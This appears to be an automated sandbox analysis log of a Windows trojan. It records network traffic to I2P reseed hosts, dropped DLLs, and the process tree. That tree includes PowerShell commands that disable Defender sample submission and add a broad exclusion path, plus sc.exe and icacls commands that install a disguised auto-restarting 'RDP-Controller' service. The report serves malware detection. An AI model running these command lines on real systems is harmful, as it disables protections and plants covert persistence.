Source: global traffic	HTTP traffic detected: GET https://reseed.memcpy.io:443/i2pseeds.su3 HTTP/1.0User-Agent: Wget/1.11.4Connection: close
Source: global traffic	HTTP traffic detected: GET https://reseed.stormycloud.org:443/i2pseeds.su3 HTTP/1.0User-Agent: Wget/1.11.4Connection: close
Source: global traffic	HTTP traffic detected: GET https://reseed.stormycloud.org:443/i2pseeds.su3 HTTP/1.0User-Agent: Wget/1.11.4Connection: close

Source: global traffic	DNS traffic detected: DNS query: reseed.memcpy.io
Source: global traffic	DNS traffic detected: DNS query: reseed.stormycloud.org

Source: 31yd7ynpdj6jw5vl4xn9qyj7u.exe, 0000000B.00000002.2383577490.00007FF7A76CE000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000018.00000002.2874424434.0000021B16782000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000003.2979115871.000002204C927000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000003.2978974700.000002204C921000.00000004.00000020.00020000.00000000.sdmp, XFS8JZFg.24.dr	String found in binary or memory: http://127.0.0.1:8118
Source: 31yd7ynpdj6jw5vl4xn9qyj7u.exe, 0000000B.00000002.2383577490.00007FF7A76CE000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000018.00000002.2874424434.0000021B16782000.00000004.00000020.00020000.00000000.sdmp, XFS8JZFg.24.dr	String found in binary or memory: http://identiguy.i2p/hosts.txt
Source: main.exe, main.exe, 00000022.00000002.3266524033.000002204CD5C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3266422424.000002204C8ED000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3267266152.00007FFD943A4000.00000002.00000001.01000000.0000000C.sdmp, XFS8JZFg.24.dr	String found in binary or memory: http://reg.i2p/hosts.txt
Source: main.exe, 00000018.00000002.2875167256.0000021B16BAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://reg.i2p/hosts.txtj
Source: main.exe, 00000018.00000002.2875358627.0000021B1704C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://reg.i2p/hosts.txtp_lib.cwJ
Source: 31yd7ynpdj6jw5vl4xn9qyj7u.exe, 0000000B.00000002.2383577490.00007FF7A76CE000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000018.00000002.2874424434.0000021B16782000.00000004.00000020.00020000.00000000.sdmp, XFS8JZFg.24.dr	String found in binary or memory: http://rus.i2p/hosts.txt
Source: main.exe, main.exe, 00000022.00000002.3266422424.000002204C8ED000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3267266152.00007FFD943A4000.00000002.00000001.01000000.0000000C.sdmp, XFS8JZFg.24.dr	String found in binary or memory: http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt
Source: main.exe, 00000018.00000002.2875167256.0000021B16BAD000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3266422424.000002204C8ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt/
Source: main.exe, 00000018.00000002.2875167256.0000021B16BAD000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3266422424.000002204C8ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txti2p.su3
Source: main.exe, 00000018.00000002.2875167256.0000021B16BAD000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3266422424.000002204C8ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txttp://
Source: 31yd7ynpdj6jw5vl4xn9qyj7u.exe, 0000000B.00000002.2383577490.00007FF7A76CE000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000018.00000002.2874424434.0000021B16782000.00000004.00000020.00020000.00000000.sdmp, XFS8JZFg.24.dr	String found in binary or memory: http://stats.i2p/cgi-bin/newhosts.txt
Source: main.exe, main.exe, 00000022.00000002.3266422424.000002204C8ED000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3267266152.00007FFD943A4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://banana.incognet.io/
Source: main.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://banana.incognet.io/b.cM
Source: main.exe, main.exe, 00000022.00000002.3266422424.000002204C8ED000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3267266152.00007FFD943A4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://i2p.ghativega.in/
Source: 31yd7ynpdj6jw5vl4xn9qyj7u.exe, 0000000B.00000002.2383577490.00007FF7A76CE000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000018.00000002.2874424434.0000021B16782000.00000004.00000020.00020000.00000000.sdmp, XFS8JZFg.24.dr	String found in binary or memory: https://i2p.mooo.com/netDb/
Source: main.exe, main.exe, 00000022.00000002.3266422424.000002204C8ED000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3267266152.00007FFD943A4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://i2p.novg.net/
Source: 31yd7ynpdj6jw5vl4xn9qyj7u.exe, 0000000B.00000002.2383577490.00007FF7A76CE000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000018.00000002.2874424434.0000021B16782000.00000004.00000020.00020000.00000000.sdmp, XFS8JZFg.24.dr	String found in binary or memory: https://i2pd.readthedocs.io/en/latest/user-guide/configuration/
Source: main.exe, main.exe, 00000022.00000002.3266524033.000002204CD00000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3266422424.000002204C8ED000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3267266152.00007FFD943A4000.00000002.00000001.01000000.0000000C.sdmp	String found in binary or memory: https://i2pseed.creativecowpat.net:8443/
Source: 31yd7ynpdj6jw5vl4xn9qyj7u.exe, 0000000B.00000002.2383577490.00007FF7A76CE000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000018.00000002.2874424434.0000021B16782000.00000004.00000020.00020000.00000000.sdmp, XFS8JZFg.24.dr	String found in binary or memory: https://legit-website.com/i2pseeds.su3
Source: 31yd7ynpdj6jw5vl4xn9qyj7u.exe, 0000000B.00000002.2383577490.00007FF7A76CE000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000018.00000002.2874424434.0000021B16782000.00000004.00000020.00020000.00000000.sdmp, XFS8JZFg.24.dr	String found in binary or memory: https://netdb.i2p2.no/
Source: main.exe, main.exe, 00000022.00000002.3266422424.000002204C8ED000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3267266152.00007FFD943A4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed-fr.i2pd.xyz/
Source: main.exe, 00000018.00000002.2875167256.0000021B16C37000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed-fr.i2pd.xyz/b.c
Source: main.exe, main.exe, 00000022.00000002.3266422424.000002204C8ED000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3267266152.00007FFD943A4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed-pl.i2pd.xyz/
Source: main.exe, main.exe, 00000022.00000002.3266422424.000002204C8ED000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3267266152.00007FFD943A4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed.diva.exchange/
Source: main.exe, 00000018.00000002.2875167256.0000021B16C37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed.diva.exchange/b.c
Source: 31yd7ynpdj6jw5vl4xn9qyj7u.exe, 0000000B.00000002.2383577490.00007FF7A76CE000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000018.00000002.2874424434.0000021B16782000.00000004.00000020.00020000.00000000.sdmp, XFS8JZFg.24.dr	String found in binary or memory: https://reseed.i2p-projekt.de/
Source: main.exe, main.exe, 00000022.00000002.3266422424.000002204C8ED000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3267266152.00007FFD943A4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed.i2pgit.org/
Source: main.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed.i2pgit.org/b.cQ
Source: main.exe, main.exe, 00000022.00000002.3266422424.000002204C8ED000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3267266152.00007FFD943A4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed.memcpy.io/
Source: main.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed.memcpy.io/p/p_lib.c
Source: main.exe, main.exe, 00000022.00000002.3266422424.000002204C8ED000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3267266152.00007FFD943A4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed.onion.im/
Source: main.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed.onion.im/$
Source: main.exe, main.exe, 00000022.00000002.3266422424.000002204C8ED000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3267266152.00007FFD943A4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed.stormycloud.org/
Source: main.exe, main.exe, 00000022.00000002.3266422424.000002204C8ED000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3267266152.00007FFD943A4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed2.i2p.net/
Source: main.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed2.i2p.net/vp/p_lib.c
Source: 31yd7ynpdj6jw5vl4xn9qyj7u.exe, 0000000B.00000002.2383577490.00007FF7A76CE000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000018.00000002.2875167256.0000021B16BD8000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000018.00000002.2876686721.00007FFD943A4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000018.00000002.2875167256.0000021B16BAD000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000018.00000002.2874424434.0000021B16782000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3266422424.000002204C8ED000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3267266152.00007FFD943A4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www2.mk16.de/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 50016 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50016
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50004
Source: unknown	Network traffic detected: HTTP traffic on port 50004 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443

Source: C:\Users\user\AppData\Local\Temp\f8ff311483bvmdq2bvv.exe

Code function: 6_2_00007FF66EBA929A inet_addr,ntohl,

6_2_00007FF66EBA929A

Source: C:\Users\user\AppData\Local\Temp\f8ff311483bvmdq2bvv.exe

Code function: 6_2_00007FF66EBB0779 CreateProcessAsUserA,

6_2_00007FF66EBB0779

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

File deleted: C:\Windows\Temp\o1i2PUnI

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02BA53FA	0_2_02BA53FA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02B94B56	0_2_02B94B56
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02B95B4A	0_2_02B95B4A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02B960DA	0_2_02B960DA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02BA702E	0_2_02BA702E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02BAD132	0_2_02BAD132
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02B97F3A	0_2_02B97F3A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02B9CDB2	0_2_02B9CDB2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02B99D02	0_2_02B99D02
Source: C:\Users\user\AppData\Local\Temp\f8ff311483bvmdq2bvv.exe	Code function: 6_2_00007FF66EBADE8A	6_2_00007FF66EBADE8A
Source: C:\Users\user\AppData\Local\Temp\f8ff311483bvmdq2bvv.exe	Code function: 6_2_00007FF66EBAE4E0	6_2_00007FF66EBAE4E0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 24_2_00007FF70CAE1AB0	24_2_00007FF70CAE1AB0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 24_2_00007FF70CADC440	24_2_00007FF70CADC440
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 24_2_00007FFDA5580880	24_2_00007FFDA5580880
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 24_2_00007FFDA55B24D0	24_2_00007FFDA55B24D0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 24_2_00007FFDA55DEF60	24_2_00007FFDA55DEF60
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 24_2_00007FFDA5BACB10	24_2_00007FFDA5BACB10
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 24_2_00007FFDAC0FEAA0	24_2_00007FFDAC0FEAA0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 24_2_00007FFDAC130480	24_2_00007FFDAC130480
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 24_2_00007FFDAC128CDB	24_2_00007FFDAC128CDB
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 24_2_00007FFDAC128DC6	24_2_00007FFDAC128DC6
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 24_2_00007FFDAC128F0E	24_2_00007FFDAC128F0E
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 24_2_00007FFDAC128FFC	24_2_00007FFDAC128FFC

Source: Joe Sandbox View	Dropped File: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dll A62BDF318386AAAB93F1D25144CFBDC1A1125AAAD867EFC4E49FE79590181EBF
Source: Joe Sandbox View	Dropped File: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dll 51C131081921626D22FAF44977D5E4DCFE00E5D6CDDEDA877A82F13631BE7C2E

Source: C:\Windows\System32\icacls.exe

Process token adjusted: Security

Source: C:\Users\user\AppData\Local\Temp\f8ff311483bvmdq2bvv.exe	Code function: String function: 00007FF66EBA14E2 appears 295 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: String function: 00007FFDAC0F1352 appears 398 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: String function: 00007FFDA55AC852 appears 526 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: String function: 00007FF70CAD2EF2 appears 314 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: String function: 00007FFDA5BA2072 appears 356 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: String function: 00007FFDA55D9DC2 appears 405 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: String function: 00007FFDA55740D2 appears 473 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: String function: 00007FFDAC1277A2 appears 388 times

Source: C:\Windows\System32\svchost.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 452 -p 5252 -ip 5252

Source: evtsrv.dll.24.dr	Static PE information: Number of sections : 11 > 10
Source: m28TQ56q.24.dr	Static PE information: Number of sections : 11 > 10
Source: rdpctl.dll.24.dr	Static PE information: Number of sections : 11 > 10
Source: o1i2PUnI.24.dr	Static PE information: Number of sections : 11 > 10
Source: dwlmgr.dll.24.dr	Static PE information: Number of sections : 11 > 10
Source: ZNdEbgqy.24.dr	Static PE information: Number of sections : 11 > 10
Source: cnccli.dll.24.dr	Static PE information: Number of sections : 11 > 10
Source: 459WBsWA.24.dr	Static PE information: Number of sections : 11 > 10
Source: CheAuE4k.24.dr	Static PE information: Number of sections : 11 > 10
Source: SCKoP3sQ.24.dr	Static PE information: Number of sections : 11 > 10
Source: OKh5fbg5.24.dr	Static PE information: Number of sections : 11 > 10
Source: file.exe	Static PE information: Number of sections : 11 > 10
Source: prgmgr.dll.24.dr	Static PE information: Number of sections : 11 > 10
Source: libi2p.dll.24.dr	Static PE information: Number of sections : 11 > 10
Source: samctl.dll.24.dr	Static PE information: Number of sections : 11 > 10
Source: termsrv32.dll.24.dr	Static PE information: Number of sections : 11 > 10
Source: nVYOsq5a.24.dr	Static PE information: Number of sections : 11 > 10

Source: file.exe, 00000000.00000000.2124527695.00000000008B0000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameLAPLINK.EXE: vs file.exe
Source: file.exe, 00000000.00000002.2128413012.0000000002588000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCOMCTL32.DLL.MUIj% vs file.exe
Source: file.exe, 00000001.00000002.3366191152.0000000002818000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCOMCTL32.DLL.MUIj% vs file.exe

Source: classification engine

Classification label: mal100.troj.evad.winEXE@51/74@2/25

Source: C:\Users\user\AppData\Local\Temp\f8ff311483bvmdq2bvv.exe

Code function: 6_2_00007FF66EBA855D CreateToolhelp32Snapshot,Process32First,Process32Next,GetLastError,GetLastError,GetLastError,OpenProcess,QueryFullProcessImageNameW,GetLastError,CloseHandle,GetLastError,CloseHandle,

6_2_00007FF66EBA855D

Source: C:\Users\user\AppData\Local\Temp\f8ff311483bvmdq2bvv.exe

Code function: 6_2_00007FF66EBA1A19 FindResourceA,LoadResource,GetLastError,GetLastError,GetLastError,GetLastError,

6_2_00007FF66EBA1A19

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Code function: 24_2_00007FF70CAD1DBC strcmp,strcmp,StartServiceCtrlDispatcherA,_read,GetLastError,

24_2_00007FF70CAD1DBC

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Code function: 24_2_00007FF70CAD1DBC strcmp,strcmp,StartServiceCtrlDispatcherA,_read,GetLastError,

24_2_00007FF70CAD1DBC

Source: C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exe

File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\WerFault.exe	Mutant created: \BaseNamedObjects\Local\SM0:5092:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5692:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6720:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5376:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2156:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3560:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5608:120:WilError_03
Source: C:\Windows\System32\WerFault.exe	Mutant created: \BaseNamedObjects\Local\WERReportingForProcess5252
Source: C:\Windows\System32\WerFault.exe	Mutant created: \BaseNamedObjects\Local\WERReportingForProcess5164
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6088:120:WilError_03
Source: C:\Windows\System32\WerFault.exe	Mutant created: \BaseNamedObjects\Local\SM0:5968:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5128:120:WilError_03

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\frdnii7m0pblld98fxhpnx.bat

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\frdnii7m0pblld98fxhpnx.bat"

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Windows\System32\taskkill.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process

Source: C:\Users\user\AppData\Local\Temp\f8ff311483bvmdq2bvv.exe

File read: C:\Users\user\AppData\Local\Temp\wfpblk.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: main.exe	String found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address_v6.ipp
Source: main.exe	String found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address_v4.ipp
Source: main.exe	String found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address.ipp
Source: main.exe	String found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address_v6.ipp
Source: main.exe	String found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address_v4.ipp
Source: main.exe	String found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address.ipp

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: unknown	Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\frdnii7m0pblld98fxhpnx.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\f8ff311483bvmdq2bvv.exe "C:\Users\user\AppData\Local\Temp\f8ff311483bvmdq2bvv.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exe "C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exe"
Source: C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exe	Process created: C:\Windows\System32\taskkill.exe taskkill.exe /F /FI "SERVICES eq RDP-Controller"
Source: C:\Windows\System32\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exe	Process created: C:\Windows\System32\sc.exe sc.exe stop RDP-Controller
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exe	Process created: C:\Windows\System32\sc.exe sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exe	Process created: C:\Windows\System32\sc.exe sc.exe failure RDP-Controller reset= 1 actions= restart/10000
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exe	Process created: C:\Windows\System32\sc.exe sc.exe start RDP-Controller
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
Source: C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exe	Process created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18
Source: C:\Windows\System32\icacls.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exe	Process created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public /restore C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\95cRhCj4pPDP.acl
Source: C:\Windows\System32\icacls.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 452 -p 5252 -ip 5252
